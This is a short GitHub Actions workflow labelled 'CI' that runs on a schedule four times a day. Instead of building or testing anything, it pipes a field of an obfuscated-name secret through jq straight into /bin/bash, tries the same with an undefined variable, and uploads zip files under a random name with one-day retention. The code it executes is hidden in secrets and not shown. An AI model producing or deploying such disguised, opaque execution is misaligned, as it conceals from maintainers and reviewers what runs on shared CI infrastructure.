name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '6 2,8,14,20 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          m0487: ${{ secrets.m0487 }}
        run: |
          printf '%s' "$m0487" | jq -r .xztao1880 | /bin/bash
          printf '%s' "$drwd49789" | jq -r .mbzy5794 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: WXUMQovL
          path: "*.zip"
          retention-days: 1
